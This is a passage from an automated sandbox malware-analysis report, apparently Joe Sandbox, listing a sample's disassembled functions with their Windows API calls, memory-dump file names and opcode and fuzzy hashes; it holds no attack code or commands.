                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                      • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                      • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                      • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                      Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                      • ExitThread.KERNEL32 ref: 004151ED
                                      • __freefls@4.LIBCMT ref: 00415209
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                      • String ID:
                                      • API String ID: 442100245-0
                                      • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                      • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                      • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                      • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                      Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                      • _wcslen.LIBCMT ref: 0045F94A
                                      • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                      • String ID: 0
                                      • API String ID: 621800784-4108050209
                                      • Opcode ID: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                      • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                      • Opcode Fuzzy Hash: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                      • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                      Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • SetErrorMode.KERNEL32 ref: 004781CE
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                      • SetErrorMode.KERNEL32(?), ref: 00478270
                                      • SetErrorMode.KERNEL32(?), ref: 00478340
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                      • String ID: \VH
                                      • API String ID: 3884216118-234962358
                                      • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                      • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                      • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                      • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                      Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                      • IsMenu.USER32(?), ref: 0044854D
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                      • DrawMenuBar.USER32 ref: 004485AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Menu$Item$DrawInfoInsert
                                      • String ID: 0
                                      • API String ID: 3076010158-4108050209
                                      • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                      • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                      • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                      • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                      Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Handle
                                      • String ID: nul
                                      • API String ID: 2519475695-2873401336
                                      • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                      • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                      • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                      • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                      Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Handle
                                      • String ID: nul
                                      • API String ID: 2519475695-2873401336
                                      • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                      • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                      • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                      • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                      Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                        • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                        • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                        • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                        • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                      • GetFocus.USER32 ref: 0046157B
                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                      • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                      • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                      • __swprintf.LIBCMT ref: 00461608
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                      • String ID: %s%d
                                      • API String ID: 2645982514-1110647743
                                      • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                      • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                      • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                      • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                      Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                      • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                      • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                      • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                      Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                      • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                      • String ID:
                                      • API String ID: 3488606520-0
                                      • Opcode ID: 7fd3602cd651dad3c5defef94bf6212d7269dc29ca20ef2dbd8ae2937eb4da43
                                      • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                      • Opcode Fuzzy Hash: 7fd3602cd651dad3c5defef94bf6212d7269dc29ca20ef2dbd8ae2937eb4da43
                                      • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                      Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ConnectRegistry_memmove_wcslen
                                      • String ID:
                                      • API String ID: 15295421-0
                                      • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                      • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                      • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                      • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                      Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                      • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                      • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$FreeLoad
                                      • String ID:
                                      • API String ID: 2449869053-0
                                      • Opcode ID: 3137254d3866a5329944bd4cd38ed45afe8262ff0536c43391529d0e6cbb617e
                                      • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                      • Opcode Fuzzy Hash: 3137254d3866a5329944bd4cd38ed45afe8262ff0536c43391529d0e6cbb617e
                                      • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                      Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 004563A6
                                      • ScreenToClient.USER32(?,?), ref: 004563C3
                                      • GetAsyncKeyState.USER32(?), ref: 00456400
                                      • GetAsyncKeyState.USER32(?), ref: 00456410
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorLongScreenWindow
                                      • String ID:
                                      • API String ID: 3539004672-0
                                      • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                      • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                      • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                      • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                      Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                      • Sleep.KERNEL32(0000000A), ref: 0047D455
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                      • String ID:
                                      • API String ID: 327565842-0
                                      • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                      • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                      • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                      • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                      Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                      • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                      • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                      • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
